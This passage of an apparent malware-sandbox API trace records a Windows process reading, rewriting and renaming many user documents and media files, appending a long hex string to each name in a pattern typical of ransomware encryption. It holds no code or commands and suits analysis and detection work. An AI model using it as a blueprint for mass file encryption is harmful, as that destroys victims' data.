lpString2=".AC743C01A7E42CC1E0A69EE42423A351EA4250D91340C2FC30DBB9FACF3C8107" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png.AC743C01A7E42CC1E0A69EE42423A351EA4250D91340C2FC30DBB9FACF3C8107") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png.AC743C01A7E42CC1E0A69EE42423A351EA4250D91340C2FC30DBB9FACF3C8107" [0166.222] GetProcessHeap () returned 0x270000 [0166.222] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x42f8190 [0166.222] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f8190, Length=0x114, FileInformationClass=0xa) returned 0x0 [0166.223] CloseHandle (hObject=0x5ac) returned 1 [0166.224] GetProcessHeap () returned 0x270000 [0166.225] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.225] RtlInterlockedCompareExchange64 () returned 0x1 [0166.226] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.228] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.228] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.230] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.231] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4", lpString2=".FCA86301ADD7B102676C82E65EF4444FC31BE910BBCA49610C34BC2279378932" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4.FCA86301ADD7B102676C82E65EF4444FC31BE910BBCA49610C34BC2279378932") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\SAhcL1 Hws.mp4.FCA86301ADD7B102676C82E65EF4444FC31BE910BBCA49610C34BC2279378932" [0166.231] GetProcessHeap () returned 0x270000 [0166.231] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x42f82b8 [0166.231] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f82b8, Length=0x114, FileInformationClass=0xa) returned 0x0 [0166.233] CloseHandle (hObject=0x5ac) returned 1 [0166.234] GetProcessHeap () returned 0x270000 [0166.235] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.235] RtlInterlockedCompareExchange64 () returned 0x1 [0166.235] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.239] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.240] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.243] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.244] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav", lpString2=".6024B4AADA2D7FFEA0669993A8929AEAD477AAC864974B02649F2F7C97635F47" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav.6024B4AADA2D7FFEA0669993A8929AEAD477AAC864974B02649F2F7C97635F47") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\sBE7Aem.wav.6024B4AADA2D7FFEA0669993A8929AEAD477AAC864974B02649F2F7C97635F47" [0166.244] GetProcessHeap () returned 0x270000 [0166.244] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10c) returned 0x42674e0 [0166.244] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42674e0, Length=0x10c, FileInformationClass=0xa) returned 0x0 [0166.246] CloseHandle (hObject=0x5ac) returned 1 [0166.248] GetProcessHeap () returned 0x270000 [0166.249] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.249] RtlInterlockedCompareExchange64 () returned 0x1 [0166.249] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.254] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x3a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.254] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.256] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.257] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods", lpString2=".5136F87B0C1E1FE41030AF9DFFD08369E791180288B02106525EDBCDBC37F321" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods.5136F87B0C1E1FE41030AF9DFFD08369E791180288B02106525EDBCDBC37F321") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\st3fSkONVrSq.ods.5136F87B0C1E1FE41030AF9DFFD08369E791180288B02106525EDBCDBC37F321" [0166.257] GetProcessHeap () returned 0x270000 [0166.257] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x116) returned 0x42f83e0 [0166.257] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f83e0, Length=0x116, FileInformationClass=0xa) returned 0x0 [0166.259] CloseHandle (hObject=0x5ac) returned 1 [0166.260] GetProcessHeap () returned 0x270000 [0166.261] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.261] RtlInterlockedCompareExchange64 () returned 0x1 [0166.261] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.266] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x6600, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.266] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.268] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.269] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc", lpString2=".5B79792A2626C00AA21F17106AAB49DD87C63D56ABD93F53207C842538E5837C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc.5B79792A2626C00AA21F17106AAB49DD87C63D56ABD93F53207C842538E5837C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\tGZjK0vavLxa.doc.5B79792A2626C00AA21F17106AAB49DD87C63D56ABD93F53207C842538E5837C" [0166.269] GetProcessHeap () returned 0x270000 [0166.269] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x116) returned 0x42f8508 [0166.269] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f8508, Length=0x116, FileInformationClass=0xa) returned 0x0 [0166.271] CloseHandle (hObject=0x5ac) returned 1 [0166.275] GetProcessHeap () returned 0x270000 [0166.276] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.276] RtlInterlockedCompareExchange64 () returned 0x1 [0166.276] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.282] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.282] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.285] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.286] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps", lpString2=".45F237763AD2306454626A10FE6E62BD2B57B7146FD5B43E2209CC25B65BBA08" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps.45F237763AD2306454626A10FE6E62BD2B57B7146FD5B43E2209CC25B65BBA08") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\tObRHMtn3GHXI.pps.45F237763AD2306454626A10FE6E62BD2B57B7146FD5B43E2209CC25B65BBA08" [0166.286] GetProcessHeap () returned 0x270000 [0166.286] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x118) returned 0x42f8630 [0166.287] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f8630, Length=0x118, FileInformationClass=0xa) returned 0x0 [0166.288] CloseHandle (hObject=0x5ac) returned 1 [0166.289] GetProcessHeap () returned 0x270000 [0166.291] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.291] RtlInterlockedCompareExchange64 () returned 0x1 [0166.291] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.402] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.412] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.415] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.416] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.430] WriteFile (in: hFile=0x5ac, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0166.431] RtlInterlockedCompareExchange64 () returned 0x0 [0166.431] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.458] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x3800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.459] RtlInterlockedCompareExchange64 () returned 0x0 [0166.459] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.470] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.472] RtlInterlockedCompareExchange64 () returned 0x0 [0166.472] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.484] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.485] RtlInterlockedCompareExchange64 () returned 0x0 [0166.485] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.500] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.502] RtlInterlockedCompareExchange64 () returned 0x0 [0166.502] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.516] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x3600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.517] RtlInterlockedCompareExchange64 () returned 0x0 [0166.517] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.537] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.539] RtlInterlockedCompareExchange64 () returned 0x0 [0166.539] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.552] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x7400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.553] RtlInterlockedCompareExchange64 () returned 0x0 [0166.553] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.564] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.566] RtlInterlockedCompareExchange64 () returned 0x0 [0166.566] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.578] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.579] RtlInterlockedCompareExchange64 () returned 0x0 [0166.579] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.597] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.598] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt", lpString2=".BAE072F60EDC072BBBD00766EB96DC253F4C7B8EB4E5E5763E139AF3712BE914" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt.BAE072F60EDC072BBBD00766EB96DC253F4C7B8EB4E5E5763E139AF3712BE914") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt.BAE072F60EDC072BBBD00766EB96DC253F4C7B8EB4E5E5763E139AF3712BE914" [0166.598] GetProcessHeap () returned 0x270000 [0166.598] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x741d2e0 [0166.599] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x741d2e0, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0166.602] CloseHandle (hObject=0x5b0) returned 1 [0166.604] GetProcessHeap () returned 0x270000 [0166.605] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.605] RtlInterlockedCompareExchange64 () returned 0x1 [0166.605] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.610] ReadFile (in: hFile=0x5b0, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.611] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.613] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.614] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf", lpString2=".AF0BC88923FFC3CAB6E4AAD17DF1230F77AE9D08FE0E03A99198402F87D40661" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf.AF0BC88923FFC3CAB6E4AAD17DF1230F77AE9D08FE0E03A99198402F87D40661") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf.AF0BC88923FFC3CAB6E4AAD17DF1230F77AE9D08FE0E03A99198402F87D40661" [0166.614] GetProcessHeap () returned 0x270000 [0166.614] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13a) returned 0x76b8160 [0166.614] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x76b8160, Length=0x13a, FileInformationClass=0xa) returned 0x0 [0166.616] CloseHandle (hObject=0x5b0) returned 1 [0166.617] GetProcessHeap () returned 0x270000 [0166.618] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.618] RtlInterlockedCompareExchange64 () returned 0x1 [0166.618] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.623] ReadFile (in: hFile=0x5b0, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x4200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.623] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.625] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.627] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf", lpString2=".AD0382A6191959AA97447D1351E5E1ABBB9D8F45453C848943303C744582A918" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf.AD0382A6191959AA97447D1351E5E1ABBB9D8F45453C848943303C744582A918") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf.AD0382A6191959AA97447D1351E5E1ABBB9D8F45453C848943303C744582A918" [0166.627] GetProcessHeap () returned 0x270000 [0166.627] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x140) returned 0x76b82a8 [0166.627] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x76b82a8, Length=0x140, FileInformationClass=0xa) returned 0x0 [0166.629] CloseHandle (hObject=0x5b0) returned 1 [0166.631] GetProcessHeap () returned 0x270000 [0166.633] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.633] RtlInterlockedCompareExchange64 () returned 0x1 [0166.633] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.638] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x5c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.639] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.641] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, 